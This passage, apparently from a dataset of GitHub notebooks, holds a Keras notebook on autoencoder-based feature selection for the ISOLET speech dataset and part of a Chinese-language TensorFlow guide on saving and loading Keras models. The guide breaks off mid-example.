text stringlengths 2.5k 6.39M | kind stringclasses 3
values |
|---|---|
# 1. Import libraries
```
#----------------------------Reproducible----------------------------------------------------------------------------------------
# Pin every RNG (Python hash seed, NumPy, `random`, TensorFlow) and force
# single-threaded TF execution so repeated runs produce identical results.
import numpy as np
import tensorflow as tf
import random as rn
import os
seed=0
os.environ['PYTHONHASHSEED'] = str(seed)  # must be set before any hashing-dependent code runs
np.random.seed(seed)
rn.seed(seed)
# Thread pools of size 1: parallel reductions are a source of nondeterminism.
session_conf =tf.compat.v1.ConfigProto(intra_op_parallelism_threads=1, inter_op_parallelism_threads=1)
from keras import backend as K
tf.compat.v1.set_random_seed(seed)
sess = tf.compat.v1.Session(graph=tf.compat.v1.get_default_graph(), config=session_conf)
K.set_session(sess)  # make standalone Keras use the seeded, single-threaded session
#----------------------------Reproducible----------------------------------------------------------------------------------------
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'  # silence TF C++ logging (3 = errors only)
#--------------------------------------------------------------------------------------------------------------------------------
from keras.datasets import mnist
from keras.models import Model
from keras.layers import Dense, Input, Flatten, Activation, Dropout, Layer
from keras.layers.normalization import BatchNormalization
from keras.utils import to_categorical
from keras import optimizers,initializers,constraints,regularizers
from keras import backend as K
from keras.callbacks import LambdaCallback,ModelCheckpoint
from keras.utils import plot_model
from sklearn.model_selection import StratifiedKFold
from sklearn.ensemble import ExtraTreesClassifier
from sklearn import svm
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import ShuffleSplit
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.svm import SVC
import h5py
import math
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.cm as cm
%matplotlib inline
matplotlib.style.use('ggplot')
import pandas as pd
from sklearn.impute import SimpleImputer
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
import scipy.sparse as sparse
#--------------------------------------------------------------------------------------------------------------------------------
#Import our self-defined methods
import sys
sys.path.append(r"./Defined")
import Functions as F
# The following code should be added before the keras model
#np.random.seed(seed)
```
# 2. Loading data
```
# Load the ISOLET spoken-letter dataset: 617 acoustic features per sample,
# last column is the class label (1..26, shifted below to 0..25).
train_data_frame=np.array(pd.read_csv('./Dataset/isolet1+2+3+4.data',header=None))
test_data_frame=np.array(pd.read_csv('./Dataset/isolet5.data',header=None))
train_data_arr=(train_data_frame[:,0:617]).copy()
train_label_arr=((train_data_frame[:,617]).copy()-1)
test_data_arr=(test_data_frame[:,0:617]).copy()
test_label_arr=((test_data_frame[:,617]).copy()-1)
# Bare `.shape` expressions only display in a notebook; they have no effect on state.
train_data_arr.shape
test_data_arr.shape
np.r_[train_data_arr,test_data_arr].shape
# Scale all features to [0, 1].
# NOTE(review): the scaler is fit on train+test jointly, which leaks test-set
# statistics into the scaling — confirm this is intended.
Data=MinMaxScaler(feature_range=(0,1)).fit_transform(np.r_[train_data_arr,test_data_arr])
Data.shape
C_train_x=Data[:len(train_data_arr)]
C_test_x=Data[len(train_data_arr):]
C_train_y=train_label_arr#to_categorical(train_label_arr)
C_test_y=test_label_arr#to_categorical(test_label_arr)
# Hold out 10% of the training split for validation.  Despite the *_onehot
# names, the labels are integer class ids (to_categorical is commented out).
x_train,x_validate,y_train_onehot,y_validate_onehot= train_test_split(C_train_x,C_train_y,test_size=0.1,random_state=seed)
x_test=C_test_x
y_test_onehot=C_test_y
print('Shape of x_train: ' + str(x_train.shape))
print('Shape of x_validate: ' + str(x_validate.shape))
print('Shape of x_test: ' + str(x_test.shape))
print('Shape of y_train: ' + str(y_train_onehot.shape))
print('Shape of y_validate: ' + str(y_validate_onehot.shape))
print('Shape of y_test: ' + str(y_test_onehot.shape))
print('Shape of C_train_x: ' + str(C_train_x.shape))
print('Shape of C_train_y: ' + str(C_train_y.shape))
print('Shape of C_test_x: ' + str(C_test_x.shape))
print('Shape of C_test_y: ' + str(C_test_y.shape))
# Number of features the selection layer should keep.
key_feture_number=85
```
# 3.Model
```
np.random.seed(seed)
#--------------------------------------------------------------------------------------------------------------------------------
class Feature_Select_Layer(Layer):
    """Keras layer that learns one non-negative weight per input feature.

    The forward pass multiplies the input by diag(|kernel|), i.e. rescales
    every feature independently.  With ``selection=True`` only the ``k``
    largest |kernel| entries are kept and the rest are zeroed, implementing
    hard feature selection with weights shared with the soft mode.
    """

    def __init__(self, output_dim, **kwargs):
        super(Feature_Select_Layer, self).__init__(**kwargs)
        self.output_dim = output_dim  # reported output width (same as input width here)

    def build(self, input_shape):
        # One scalar weight per input feature, initialised very close to 1 so
        # training starts from (almost) the identity map.
        self.kernel = self.add_weight(name='kernel',
                                      shape=(input_shape[1],),
                                      initializer=initializers.RandomUniform(minval=0.999999, maxval=0.9999999, seed=seed),
                                      trainable=True)
        super(Feature_Select_Layer, self).build(input_shape)

    def call(self, x, selection=False, k=key_feture_number):
        # Use magnitudes only: the sign of a weight carries no selection meaning.
        kernel = K.abs(self.kernel)
        if selection:
            # Zero every weight below the k-th largest magnitude so at most the
            # top-k features pass through (ties on the threshold may keep more).
            kernel_ = K.transpose(kernel)  # no-op on a 1-D tensor; kept as written
            kth_largest = tf.math.top_k(kernel_, k=k)[0][-1]
            kernel = tf.where(condition=K.less(kernel, kth_largest), x=K.zeros_like(kernel), y=kernel)
        # Multiplying by diag(kernel) == element-wise scaling of each feature column.
        return K.dot(x, tf.linalg.tensor_diag(kernel))

    def compute_output_shape(self, input_shape):
        return (input_shape[0], self.output_dim)
#--------------------------------------------------------------------------------------------------------------------------------
def Autoencoder(p_data_feature=x_train.shape[1],
                p_encoding_dim=key_feture_number,
                p_learning_rate= 1E-3):
    """Build a plain linear autoencoder and a view onto its bottleneck.

    Architecture: input -> Dense(p_encoding_dim, linear) -> Dense(p_data_feature, linear).
    Returns ``(autoencoder, latent_encoder)`` where ``latent_encoder`` maps the
    same input to the hidden (bottleneck) activations.
    """
    img_in = Input(shape=(p_data_feature,), name='input_img')
    hidden = Dense(p_encoding_dim, activation='linear',
                   kernel_initializer=initializers.glorot_uniform(seed))(img_in)
    reconstructed = Dense(p_data_feature, activation='linear',
                          kernel_initializer=initializers.glorot_uniform(seed))(hidden)
    # Two models over one graph: they share all layers and weights.
    latent_encoder = Model(img_in, hidden)
    autoencoder = Model(img_in, reconstructed)
    autoencoder.compile(loss='mean_squared_error',
                        optimizer=optimizers.Adam(lr=p_learning_rate))
    print('Autoencoder Structure-------------------------------------')
    autoencoder.summary()
    return autoencoder, latent_encoder
#--------------------------------------------------------------------------------------------------------------------------------
def Identity_Autoencoder(p_data_feature=x_train.shape[1],
                         p_encoding_dim=key_feture_number,
                         p_learning_rate= 1E-3):
    """Linear autoencoder with a soft feature-scaling layer in front.

    The Feature_Select_Layer is used in its default (non-selecting) mode, so
    every feature is merely rescaled by a learned weight before encoding.
    Returns ``(autoencoder, latent_encoder_score)``.
    """
    img_in = Input(shape=(p_data_feature,), name='autoencoder_input')
    fs_layer = Feature_Select_Layer(output_dim=p_data_feature,
                                    input_shape=(p_data_feature,),
                                    name='feature_selection')
    scaled = fs_layer(img_in)
    hidden = Dense(p_encoding_dim,
                   activation='linear',
                   kernel_initializer=initializers.glorot_uniform(seed),
                   name='autoencoder_hidden_layer')(scaled)
    reconstructed = Dense(p_data_feature,
                          activation='linear',
                          kernel_initializer=initializers.glorot_uniform(seed),
                          name='autoencoder_output')(hidden)
    # Shared-graph views: bottleneck extractor and full reconstructor.
    latent_encoder_score = Model(img_in, hidden)
    autoencoder = Model(img_in, reconstructed)
    autoencoder.compile(loss='mean_squared_error',
                        optimizer=optimizers.Adam(lr=p_learning_rate))
    print('Autoencoder Structure-------------------------------------')
    autoencoder.summary()
    return autoencoder, latent_encoder_score
#--------------------------------------------------------------------------------------------------------------------------------
def Fractal_Autoencoder(p_data_feature=x_train.shape[1],
                        p_feture_number=key_feture_number,
                        p_encoding_dim=key_feture_number,
                        p_learning_rate=1E-3,
                        p_loss_weight_1=1,
                        p_loss_weight_2=2):
    """Two-branch autoencoder used for unsupervised feature selection.

    Both branches share the SAME selection, hidden and output layer objects;
    they differ only in the selection layer's mode:
      * "score" branch  — soft mode, all features pass (selection=False);
      * "choose" branch — hard mode, only the top ``p_feture_number``
        features pass (selection=True).
    Total loss = p_loss_weight_1 * MSE(score) + p_loss_weight_2 * MSE(choose).
    Returns (autoencoder, feature_selection_output, latent_encoder_score,
    latent_encoder_choose).
    """
    input_img = Input(shape=(p_data_feature,), name='autoencoder_input')
    feature_selection = Feature_Select_Layer(output_dim=p_data_feature,
                                             input_shape=(p_data_feature,),
                                             name='feature_selection')
    # One layer object, called twice -> both branches train one weight vector.
    feature_selection_score=feature_selection(input_img)
    feature_selection_choose=feature_selection(input_img,selection=True,k=p_feture_number)
    encoded = Dense(p_encoding_dim,
                    activation='linear',
                    kernel_initializer=initializers.glorot_uniform(seed),
                    name='autoencoder_hidden_layer')
    encoded_score=encoded(feature_selection_score)
    encoded_choose=encoded(feature_selection_choose)
    bottleneck_score=encoded_score
    bottleneck_choose=encoded_choose
    decoded = Dense(p_data_feature,
                    activation='linear',
                    kernel_initializer=initializers.glorot_uniform(seed),
                    name='autoencoder_output')
    decoded_score =decoded(bottleneck_score)
    decoded_choose =decoded(bottleneck_choose)
    # Auxiliary views over the shared graph for later analysis cells.
    latent_encoder_score = Model(input_img, bottleneck_score)
    latent_encoder_choose = Model(input_img, bottleneck_choose)
    feature_selection_output=Model(input_img,feature_selection_choose)
    autoencoder = Model(input_img, [decoded_score,decoded_choose])
    autoencoder.compile(loss=['mean_squared_error','mean_squared_error'],
                        loss_weights=[p_loss_weight_1, p_loss_weight_2],
                        optimizer=optimizers.Adam(lr=p_learning_rate))
    print('Autoencoder Structure-------------------------------------')
    autoencoder.summary()
    return autoencoder,feature_selection_output,latent_encoder_score,latent_encoder_choose
```
## 3.1 Structure and paramter testing
```
epochs_number=200    # training epochs for the experiments below
batch_size_value=64  # mini-batch size used by fit()
```
---
### 3.1.1 Fractal Autoencoder
---
```
# Loss weight for the soft "score" branch; the hard "choose" branch keeps
# weight 1, so reconstruction through the selected features dominates.
loss_weight_1=0.0078125
F_AE,\
feature_selection_output,\
latent_encoder_score_F_AE,\
latent_encoder_choose_F_AE=Fractal_Autoencoder(p_data_feature=x_train.shape[1],\
                                               p_feture_number=key_feture_number,\
                                               p_encoding_dim=key_feture_number,\
                                               p_learning_rate= 1E-3,\
                                               p_loss_weight_1=loss_weight_1,\
                                               p_loss_weight_2=1)
# Snapshot the weights every 100 epochs.
# NOTE(review): `period=` is deprecated in newer Keras (use `save_freq=`);
# confirm it matches the Keras version this notebook targets.
model_checkpoint=ModelCheckpoint('./log_weights/F_AE_'+str(key_feture_number)+'_weights_'+str(loss_weight_1)+'.{epoch:04d}.hdf5',period=100,save_weights_only=True,verbose=1)
# Both outputs regress the input itself (autoencoder targets).
F_AE_history = F_AE.fit(x_train, [x_train,x_train],\
                        epochs=epochs_number,\
                        batch_size=batch_size_value,\
                        shuffle=True,\
                        validation_data=(x_validate, [x_validate,x_validate]),\
                        callbacks=[model_checkpoint])
# Plot the training/validation loss curves recorded by fit(), then report the
# per-element test MSE of both decoder branches.
loss = F_AE_history.history['loss']
val_loss = F_AE_history.history['val_loss']
# Derive the x-axis from the recorded history (== epochs_number when training
# ran to completion), so the plots stay consistent if fewer epochs ran.
epochs = range(len(loss))
plt.plot(epochs, loss, 'bo', label='Training Loss')
plt.plot(epochs, val_loss, 'r', label='Validation Loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.show()
# Zoomed view of the tail of the curves.  The original hard-coded [250:],
# which is an empty slice whenever fewer than 251 epochs were run (only 200
# here), producing blank plots; clamp the window start to the history length.
tail_start = min(250, max(len(loss) - 1, 0))
plt.plot(epochs[tail_start:], loss[tail_start:], 'bo', label='Training Loss')
plt.plot(epochs[tail_start:], val_loss[tail_start:], 'r', label='Validation Loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.show()
# predict() returns [score_branch, choose_branch]; compare each against x_test.
p_data=F_AE.predict(x_test)
numbers=x_test.shape[0]*x_test.shape[1]
print("MSE for one-to-one map layer",np.sum(np.power(np.array(p_data)[0]-x_test,2))/numbers)
print("MSE for feature selection layer",np.sum(np.power(np.array(p_data)[1]-x_test,2))/numbers)
```
---
### 3.1.2 Feature selection layer output
---
```
# Run the hard-selection branch on the test set and count how many features
# survive (are non-zero) in the first test sample.
FS_layer_output=feature_selection_output.predict(x_test)
print(np.sum(FS_layer_output[0]>0))
```
---
### 3.1.3 Key features show
---
```
# Binarize the learned per-feature weights: keep the top key_feture_number
# entries of the selection layer's kernel (layer index 1), zero the rest.
key_features=F.top_k_keepWeights_1(F_AE.get_layer(index=1).get_weights()[0],key_feture_number)
print(np.sum(F_AE.get_layer(index=1).get_weights()[0]>0))
```
# 4 Classifying
### 4.1 Extra Trees
```
# Baseline: Extra-Trees accuracy on ALL 617 original features.
train_feature=C_train_x
train_label=C_train_y
test_feature=C_test_x
test_label=C_test_y
p_seed=seed
F.ETree(train_feature,train_label,test_feature,test_label,p_seed)
# Indices of the selected (non-zero) features, reused by the cells below.
selected_position_list=np.where(key_features>0)[0]
```
---
#### 4.1.1. On Identity Selection layer
---
a) with zeros
```
# Extra-Trees on the selection layer's output; unselected features stay as
# zero columns (dimensionality unchanged).
train_feature=feature_selection_output.predict(C_train_x)
print("train_feature>0: ",np.sum(train_feature[0]>0))
print(train_feature.shape)
train_label=C_train_y
test_feature=feature_selection_output.predict(C_test_x)
print("test_feature>0: ",np.sum(test_feature[0]>0))
print(test_feature.shape)
test_label=C_test_y
p_seed=seed
F.ETree(train_feature,train_label,test_feature,test_label,p_seed)
```
---
b) Sparse matrix
```
# Same features as the previous cell, but passed as sparse COO matrices
# (the selection output is mostly zero columns).
train_feature=feature_selection_output.predict(C_train_x)
print(train_feature.shape)
train_label=C_train_y
test_feature=feature_selection_output.predict(C_test_x)
print(test_feature.shape)
test_label=C_test_y
train_feature_sparse=sparse.coo_matrix(train_feature)
test_feature_sparse=sparse.coo_matrix(test_feature)
p_seed=seed
F.ETree(train_feature_sparse,train_label,test_feature_sparse,test_label,p_seed)
```
---
c) Compression
```
# Drop the zero columns, keeping only key_feture_number compressed columns.
train_feature_=feature_selection_output.predict(C_train_x)
train_feature=F.compress_zero(train_feature_,key_feture_number)
print(train_feature.shape)
train_label=C_train_y
test_feature_=feature_selection_output.predict(C_test_x)
test_feature=F.compress_zero(test_feature_,key_feture_number)
print(test_feature.shape)
test_label=C_test_y
p_seed=seed
F.ETree(train_feature,train_label,test_feature,test_label,p_seed)
```
---
d) Compression with structure
```
# Compress using the known selected positions so train and test keep the
# exact same column order.
train_feature_=feature_selection_output.predict(C_train_x)
train_feature=F.compress_zero_withkeystructure(train_feature_,selected_position_list)
print(train_feature.shape)
train_label=C_train_y
test_feature_=feature_selection_output.predict(C_test_x)
test_feature=F.compress_zero_withkeystructure(test_feature_,selected_position_list)
print(test_feature.shape)
test_label=C_test_y
p_seed=seed
F.ETree(train_feature,train_label,test_feature,test_label,p_seed)
```
---
#### 4.1.2. On Original Selection
---
a) with zeros
```
# Mask the ORIGINAL (unscaled-by-layer) features with the binarized
# key_features vector; unselected features become zero columns.
train_feature=np.multiply(C_train_x, key_features)
print("train_feature>0: ",np.sum(train_feature[0]>0))
print(train_feature.shape)
train_label=C_train_y
test_feature=np.multiply(C_test_x, key_features)
print("test_feature>0: ",np.sum(test_feature[0]>0))
print(test_feature.shape)
test_label=C_test_y
p_seed=seed
F.ETree(train_feature,train_label,test_feature,test_label,p_seed)
```
---
b) Sparse matrix
```
# Same masked original features, passed as sparse COO matrices.
train_feature=np.multiply(C_train_x, key_features)
print(train_feature.shape)
train_label=C_train_y
test_feature=np.multiply(C_test_x, key_features)
print(test_feature.shape)
test_label=C_test_y
train_feature_sparse=sparse.coo_matrix(train_feature)
test_feature_sparse=sparse.coo_matrix(test_feature)
p_seed=seed
F.ETree(train_feature_sparse,train_label,test_feature_sparse,test_label,p_seed)
```
---
c) Compression
```
# Masked original features with the zero columns compressed away.
train_feature_=np.multiply(C_train_x, key_features)
train_feature=F.compress_zero(train_feature_,key_feture_number)
print(train_feature.shape)
train_label=C_train_y
test_feature_=np.multiply(C_test_x, key_features)
test_feature=F.compress_zero(test_feature_,key_feture_number)
print(test_feature.shape)
test_label=C_test_y
p_seed=seed
F.ETree(train_feature,train_label,test_feature,test_label,p_seed)
```
---
d) Compression with structure
```
# Masked original features, compressed via the selected-position list so the
# column order is fixed across splits.
train_feature_=np.multiply(C_train_x, key_features)
train_feature=F.compress_zero_withkeystructure(train_feature_,selected_position_list)
print(train_feature.shape)
train_label=C_train_y
test_feature_=np.multiply(C_test_x, key_features)
test_feature=F.compress_zero_withkeystructure(test_feature_,selected_position_list)
print(test_feature.shape)
test_label=C_test_y
p_seed=seed
F.ETree(train_feature,train_label,test_feature,test_label,p_seed)
```
---
#### 4.1.3. Latent space
---
```
# Extra-Trees on the bottleneck representations: first the soft "score"
# branch, then the hard "choose" (top-k) branch.
train_feature=latent_encoder_score_F_AE.predict(C_train_x)
print(train_feature.shape)
train_label=C_train_y
test_feature=latent_encoder_score_F_AE.predict(C_test_x)
print(test_feature.shape)
test_label=C_test_y
p_seed=seed
F.ETree(train_feature,train_label,test_feature,test_label,p_seed)
train_feature=latent_encoder_choose_F_AE.predict(C_train_x)
print(train_feature.shape)
train_label=C_train_y
test_feature=latent_encoder_choose_F_AE.predict(C_test_x)
print(test_feature.shape)
test_label=C_test_y
p_seed=seed
F.ETree(train_feature,train_label,test_feature,test_label,p_seed)
```
# 6. Reconstruction loss
```
from sklearn.linear_model import LinearRegression

def mse_check(train, test):
    """Fit a linear map from train[0] to train[1]; return the mean squared
    error of its predictions on the held-out (test[0], test[1]) pair."""
    regressor = LinearRegression(n_jobs=-1)
    regressor.fit(train[0], train[1])
    residual = regressor.predict(test[0]) - test[1]
    return (residual ** 2).mean()
# Linear-reconstruction check: how well do the selected (compressed) features
# linearly predict the full 617-dimensional feature vector?
train_feature_=np.multiply(C_train_x, key_features)
C_train_selected_x=F.compress_zero_withkeystructure(train_feature_,selected_position_list)
print(C_train_selected_x.shape)
test_feature_=np.multiply(C_test_x, key_features)
C_test_selected_x=F.compress_zero_withkeystructure(test_feature_,selected_position_list)
print(C_test_selected_x.shape)
# Tuples are (inputs, regression targets) for mse_check.
train_feature_tuple=(C_train_selected_x,C_train_x)
test_feature_tuple=(C_test_selected_x,C_test_x)
reconstruction_loss=mse_check(train_feature_tuple, test_feature_tuple)
print(reconstruction_loss)
```
| github_jupyter |
##### Copyright 2020 The TensorFlow Authors.
```
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
```
# 保存和加载 Keras 模型
<table class="tfo-notebook-buttons" align="left">
<td><a target="_blank" href="https://tensorflow.google.cn/guide/keras/save_and_serialize" class=""><img src="https://tensorflow.google.cn/images/tf_logo_32px.png" class="">在 TensorFlow.org 上查看 </a></td>
<td><a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs-l10n/blob/master/site/zh-cn/guide/keras/save_and_serialize.ipynb" class=""><img src="https://tensorflow.google.cn/images/colab_logo_32px.png">在 Google Colab 中运行</a></td>
<td><a target="_blank" href="https://github.com/tensorflow/docs-l10n/blob/master/site/zh-cn/guide/keras/save_and_serialize.ipynb" class=""><img src="https://tensorflow.google.cn/images/GitHub-Mark-32px.png">在 GitHub 上查看源代码</a></td>
<td><a href="https://storage.googleapis.com/tensorflow_docs/docs-l10n/site/zh-cn/guide/keras/save_and_serialize.ipynb" class=""><img src="https://tensorflow.google.cn/images/download_logo_32px.png">下载笔记本</a></td>
</table>
## 简介
Keras 模型由多个组件组成:
- 架构或配置,它指定模型包含的层及其连接方式。
- 一组权重值(即“模型的状态”)。
- 优化器(通过编译模型来定义)。
- 一组损失和指标(通过编译模型或通过调用 `add_loss()` 或 `add_metric()` 来定义)。
您可以通过 Keras API 将这些片段一次性保存到磁盘,或仅选择性地保存其中一些片段:
- 将所有内容以 TensorFlow SavedModel 格式(或较早的 Keras H5 格式)保存到单个归档。这是标准做法。
- 仅保存架构/配置,通常保存为 JSON 文件。
- 仅保存权重值。通常在训练模型时使用。
下面我们来看看每个选项:什么时候选择其中哪个选项?它们是如何工作的?
## 对于保存和加载的简短回答
如果您只有 10 秒钟来阅读本指南,则您只需了解以下内容。
**保存 Keras 模型:**
```python
model = ...  # Get model (Sequential, Functional Model, or Model subclass)
model.save('path/to/location')
```
**将模型加载回来:**
```python
from tensorflow import keras
model = keras.models.load_model('path/to/location')
```
现在,我们来看看详细内容。
## 设置
```
import numpy as np
import tensorflow as tf
from tensorflow import keras
```
## 保存和加载整个模型
您可以将整个模型保存到单个工件中。它将包括:
- 模型的架构/配置
- 模型的权重值(在训练过程中学习)
- 模型的编译信息(如果调用了 `compile()`)
- 优化器及其状态(如果有的话,使您可以从上次中断的位置重新开始训练)
#### API
- `model.save()` 或 `tf.keras.models.save_model()`
- `tf.keras.models.load_model()`
您可以使用两种格式将整个模型保存到磁盘:**TensorFlow SavedModel 格式**和**较早的 Keras H5 格式**。推荐使用 SavedModel 格式。它是使用 `model.save()` 时的默认格式。
您可以通过以下方式切换到 H5 格式:
- 将 `save_format='h5'` 传递给 `save()`。
- 将以 `.h5` 或 `.keras` 结尾的文件名传递给 `save()`。
### SavedModel 格式
**示例:**
```
def get_model():
    """Build and compile a minimal one-Dense-layer regression model."""
    model_input = keras.Input(shape=(32,))
    model_output = keras.layers.Dense(1)(model_input)
    simple_model = keras.Model(model_input, model_output)
    simple_model.compile(optimizer="adam", loss="mean_squared_error")
    return simple_model
model = get_model()
# Train the model on random data so there is real state to save.
test_input = np.random.random((128, 32))
test_target = np.random.random((128, 1))
model.fit(test_input, test_target)
# Calling `save('my_model')` creates a SavedModel folder `my_model`.
model.save("my_model")
# It can be used to reconstruct the model identically.
reconstructed_model = keras.models.load_model("my_model")
# Check: both models produce the same predictions.
np.testing.assert_allclose(
    model.predict(test_input), reconstructed_model.predict(test_input)
)
# The reconstructed model is already compiled and has retained the optimizer
# state, so training can resume:
reconstructed_model.fit(test_input, test_target)
```
#### SavedModel 包含的内容
调用 `model.save('my_model')` 会创建一个名为 `my_model` 的文件夹,其包含以下内容:
```
!ls my_model
```
模型架构和训练配置(包括优化器、损失和指标)存储在 `saved_model.pb` 中。权重保存在 `variables/` 目录下。
有关 SavedModel 格式的详细信息,请参阅 [SavedModel 指南(*磁盘上的 SavedModel 格式*)](https://tensorflow.google.cn/guide/saved_model#the_savedmodel_format_on_disk)。
#### SavedModel 处理自定义对象的方式
保存模型和模型的层时,SavedModel 格式会存储类名称、**调用函数**、损失和权重(如果已实现,则还包括配置)。调用函数会定义模型/层的计算图。
如果没有模型/层配置,调用函数会被用来创建一个与原始模型类似的模型,该模型可以被训练、评估和用于推断。
尽管如此,在编写自定义模型或层类时,对 `get_config` 和 `from_config` 方法进行定义始终是一种好的做法。这样您就可以稍后根据需要轻松更新计算。有关详细信息,请参阅[自定义对象](save_and_serialize.ipynb#custom-objects)。
以下示例演示了在**没有**重写配置方法的情况下,从 SavedModel 格式加载自定义层所发生的情况。
```
class CustomModel(keras.Model):
    """Subclassed model (stack of Dense layers) WITHOUT get_config — used to
    show that SavedModel can still reload it from the traced call graph."""
    def __init__(self, hidden_units):
        super(CustomModel, self).__init__()
        self.dense_layers = [keras.layers.Dense(u) for u in hidden_units]
    def call(self, inputs):
        x = inputs
        for layer in self.dense_layers:
            x = layer(x)
        return x

model = CustomModel([16, 16, 10])
# Build the model by calling it once (creates the weights).
input_arr = tf.random.uniform((1, 5))
outputs = model(input_arr)
model.save("my_model")
# Delete the custom-defined model class to ensure that the loader does not have
# access to it.
del CustomModel
loaded = keras.models.load_model("my_model")
# The reloaded object reproduces the original outputs exactly.
np.testing.assert_allclose(loaded(input_arr), outputs)
print("Original model:", model)
print("Loaded model:", loaded)
```
如上例所示,加载器动态地创建了一个与原始模型行为类似的新模型。
### Keras H5 格式
Keras 还支持保存单个 HDF5 文件,其中包含模型的架构、权重值和 `compile()` 信息。它是 SavedModel 的轻量化替代选择。
**示例:**
```
model = get_model()
# Train the model on random data so there is real state to save.
test_input = np.random.random((128, 32))
test_target = np.random.random((128, 1))
model.fit(test_input, test_target)
# Calling `save('my_h5_model.h5')` creates a h5 file `my_h5_model.h5`.
# (The `.h5` suffix selects the HDF5 format instead of SavedModel.)
model.save("my_h5_model.h5")
# It can be used to reconstruct the model identically.
reconstructed_model = keras.models.load_model("my_h5_model.h5")
# Check: both models produce the same predictions.
np.testing.assert_allclose(
    model.predict(test_input), reconstructed_model.predict(test_input)
)
# The reconstructed model is already compiled and has retained the optimizer
# state, so training can resume:
reconstructed_model.fit(test_input, test_target)
```
#### 限制
与 SavedModel 格式相比,H5 文件不包括以下两方面内容:
- 通过 `model.add_loss()` 和 `model.add_metric()` 添加的**外部损失和指标**不会被保存(这与 SavedModel 不同)。如果您的模型有此类损失和指标且您想要恢复训练,则您需要在加载模型后自行重新添加这些损失。请注意,这不适用于通过 `self.add_loss()` 和 `self.add_metric()` 在层*内*创建的损失/指标。只要该层被加载,这些损失和指标就会被保留,因为它们是该层 `call` 方法的一部分。
- 已保存的文件中不包含**自定义对象(如自定义层)的计算图**。在加载时,Keras 需要访问这些对象的 Python 类/函数以重建模型。请参阅[自定义对象](save_and_serialize.ipynb#custom-objects)。
## 保存架构
模型的配置(或架构)指定模型包含的层,以及这些层的连接方式*。如果您有模型的配置,则可以使用权重的新初始化状态创建模型,而无需编译信息。
*请注意,这仅适用于使用函数式或序列式 API 定义的模型,不适用于子类化模型。
### 序贯模型或函数式 API 模型的配置
这些类型的模型是显式的层计算图:它们的配置始终以结构化形式提供。
#### API
- `get_config()` 和 `from_config()`
- `tf.keras.models.model_to_json()` 和 `tf.keras.models.model_from_json()`
#### `get_config()` 和 `from_config()`
调用 `config = model.get_config()` 将返回一个包含模型配置的 Python 字典。然后可以通过 `Sequential.from_config(config)`(针对 `Sequential` 模型)或 `Model.from_config(config)`(针对函数式 API 模型)重建同一模型。
相同的工作流也适用于任何可序列化的层。
**层示例:**
```
# Round-trip a single layer through its config dict: get_config() captures the
# constructor arguments, from_config() rebuilds an equivalent (freshly
# initialised — weights are NOT carried over) layer.
layer = keras.layers.Dense(3, activation="relu")
layer_config = layer.get_config()
new_layer = keras.layers.Dense.from_config(layer_config)
```
**序贯模型示例:**
```
# Config round-trip for a Sequential model (architecture only, no weights).
model = keras.Sequential([keras.Input((32,)), keras.layers.Dense(1)])
config = model.get_config()
new_model = keras.Sequential.from_config(config)
```
**函数式模型示例:**
```
# Config round-trip for a functional-API model (architecture only, no weights).
inputs = keras.Input((32,))
outputs = keras.layers.Dense(1)(inputs)
model = keras.Model(inputs, outputs)
config = model.get_config()
new_model = keras.Model.from_config(config)
```
#### `to_json()` 和 `tf.keras.models.model_from_json()`
这与 `get_config` / `from_config` 类似,不同之处在于它会将模型转换成 JSON 字符串,之后该字符串可以在没有原始模型类的情况下进行加载。它还特定于模型,不适用于层。
**示例:**
```
# JSON round-trip: like get_config/from_config but the architecture is a
# plain JSON string, loadable without the original model class.
model = keras.Sequential([keras.Input((32,)), keras.layers.Dense(1)])
json_config = model.to_json()
new_model = keras.models.model_from_json(json_config)
```
### 自定义对象
**模型和层**
子类化模型和层的架构在 `__init__` 和 `call` 方法中进行定义。它们被视为 Python 字节码,无法将其序列化为兼容 JSON 的配置,您可以尝试对字节码进行序列化(例如通过 `pickle`),但这样做极不安全,因为模型将无法在其他系统上进行加载。
为了保存/加载带有自定义层的模型或子类化模型,您应该重写 `get_config` 和 `from_config`(可选)方法。此外,您应该注册自定义对象,以便 Keras 能够感知它。
**自定义函数**
自定义函数(如激活函数、损失函数或初始化器)不需要 `get_config` 方法。只需将函数名称注册为自定义对象,就足以进行加载。
**仅加载 TensorFlow 计算图**
您可以加载由 Keras 生成的 TensorFlow 计算图。要进行此类加载,您无需提供任何 `custom_objects`。您可以执行以下代码进行加载:
```
# Load the SavedModel as a raw TF object (not a Keras model): no
# custom_objects are needed, but Keras APIs like .fit()/.predict() are gone.
model.save("my_model")
tensorflow_graph = tf.saved_model.load("my_model")
x = np.random.uniform(size=(4, 32)).astype(np.float32)
predicted = tensorflow_graph(x).numpy()
```
请注意,此方法有几个缺点:
- 由于可追溯性原因,您应该始终可以访问所使用的自定义对象。您不会希望将无法重新创建的模型投入生产。
- `tf.saved_model.load` 返回的对象不是 Keras 模型,因此不太容易使用。例如,您将无法访问 `.predict()` 或 `.fit()`。
虽然不鼓励使用此方法,但当您遇到棘手问题(例如,您丢失了自定义对象的代码,或在使用 `tf.keras.models.load_model()` 加载模型时遇到了问题)时,它还是能够提供帮助。
有关详细信息,请参阅 [`tf.saved_model.load` 相关页面](https://tensorflow.google.cn/api_docs/python/tf/saved_model/load)。
#### 定义配置方法
规范:
- `get_config` 应该返回一个 JSON 可序列化字典,以便与 Keras 保存架构和模型的 API 兼容。
- `from_config(config)` (`classmethod`) 应该返回一个根据配置创建的新层或新模型对象。默认实现返回 `cls(**config)`。
**示例:**
```
class CustomLayer(keras.layers.Layer):
    """Layer holding one variable `var`; demonstrates get_config/from_config."""
    # NOTE(review): super().__init__() is not called here; recent Keras
    # versions reject attribute assignment before it — confirm against the
    # TF/Keras version this guide targets.
    def __init__(self, a):
        self.var = tf.Variable(a, name="var_a")
